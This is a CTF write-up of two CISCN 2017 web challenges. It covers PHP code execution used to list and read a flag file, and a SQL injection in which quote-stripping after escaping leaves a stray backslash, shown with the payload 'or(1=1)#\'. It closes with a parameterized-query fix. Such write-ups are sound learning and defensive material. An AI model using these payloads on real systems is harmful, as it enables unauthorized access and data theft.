10th National College Student Information Security Contest (CISCN 2017): partial web write-up

I played the 10th National College Student Information Security Contest last weekend. The challenges were decent, but some aspects of this contest were quite remarkable, heh~
Here I'm writing down the two web challenges I managed to solve (I'm too weak).
ven's write-up: http://www.venenof.com/index.php/archives/386/
tu's (LoRexxar's) write-up: http://lorexxar.cn/2017/07/11/guosai2017/
ningmeng's write-up: http://www.cnblogs.com/iamstudy/articles/2017_quanguo_ctf_web_writeup.html

php exercise

PHP code execution
My approach: list the files with print_r(scandir('./')), write a file with file_put_contents("121.php", "<?php include 'flag.php'; echo $flag;?>"), and use Burp's Intruder to keep re-creating the contents of 121.php (not very smart).
Other approaches: list the files with print_r(glob('./f*')) and read the file contents with show_source.

wanna to see your hat?

Capturing the request shows the query: select count(*) from t_info where username = 'aaa' or nickname = 'aaa'
Found an exposed .svn directory (source leak).
Auditing the source, the key part is:

if(isset($_SESSION['hat'])){
    if($_SESSION['hat']=='green'){
        output("<img src='green-hat-1.jpg'>",10);
    }else{
        // any value other than 'green' (login.php sets 'black') prints the flag
        output("<img src='black-fedora.jpg'>",1);
        echo $flag;
    }
}

The session value is set in login.php:

if (isset($_POST["name"])){
    // waf() is the challenge's escaping function (behaves like addslashes); the quote it escapes is then stripped
    $name = str_replace("'", "", trim(waf($_POST["name"])));
    if (strlen($name) > 11){
        echo("<script>alert('name too long')</script>");
    }else{
        $sql = "select count(*) from t_info where username = '$name' or nickname = '$name'";
        echo $sql;
        $result = mysql_query($sql);
        $row = mysql_fetch_array($result);
        if ($row[0]){
            $_SESSION['hat'] = 'black';
            echo 'good job';
        }else{
            $_SESSION['hat'] = 'green';
        }
        header("Location: index.php");
    }
}

It contains this line: $name = str_replace("'", "", trim(waf($_POST["name"])));
This means the single quote that addslashes has escaped is stripped, leaving a bare backslash in $name; that backslash then escapes the query's own closing single quote, so the original quotes in the SQL statement are swallowed and the rest of the input becomes part of the query.
payload: select count(*) from t_info where username = 'or(1=1)#\' or nickname = 'or(1=1)#\'
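To make the root cause concrete, here is an added example (not the challenge's own code) that places the write-up's quote-stripping sanitizer next to a parameterized version of the same query. The challenge's waf() is not on the page; the write-up says it escapes like addslashes(), so that is assumed here. The table and row are a constructed SQLite in-memory fixture so the example runs offline.

```php
<?php
// Added example, not part of the challenge source.
// Assumption: the challenge's waf() behaves like addslashes().
function waf(string $s): string {
    return addslashes($s);
}

// Vulnerable builder from login.php: addslashes() turns ' into \' and the
// str_replace() then removes the ', leaving a bare backslash that is
// interpolated straight into the SQL text.
function build_query_vulnerable(string $name): string {
    $name = str_replace("'", "", trim(waf($name)));
    return "select count(*) from t_info where username = '$name' or nickname = '$name'";
}

// Hardened version: the value never becomes part of the SQL text. It is
// bound as a parameter, so quotes and backslashes are data, not syntax.
// The length check from login.php is kept, as a rejection rather than an alert.
function count_matches_safe(PDO $db, string $name): int {
    $name = trim($name);
    if (strlen($name) > 11) {
        throw new InvalidArgumentException('name too long');
    }
    $stmt = $db->prepare(
        'select count(*) from t_info where username = :n1 or nickname = :n2'
    );
    $stmt->execute([':n1' => $name, ':n2' => $name]);
    return (int) $stmt->fetchColumn();
}

// Constructed fixture: one user row in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('create table t_info (username text, nickname text)');
$db->exec("insert into t_info values ('admin', 'boss')");

// Constructed input containing a single quote, the same shape as the
// write-up's payload.
$input = "or(1=1)#'";

// Shows the backslash sitting where the closing quote should be: the
// sanitizer did not stop the quote from influencing query structure.
echo build_query_vulnerable($input), "\n";

// With a bound parameter the same input is just an unmatched string.
printf("safe count for %s: %d\n", $input, count_matches_safe($db, $input));   // 0
printf("safe count for admin: %d\n", count_matches_safe($db, 'admin'));      // 1
```

Escaping followed by character stripping is the general failure pattern here: any later transformation of an escaped string can undo the escaping, while a bound parameter is never re-parsed as SQL regardless of what transformations run before it.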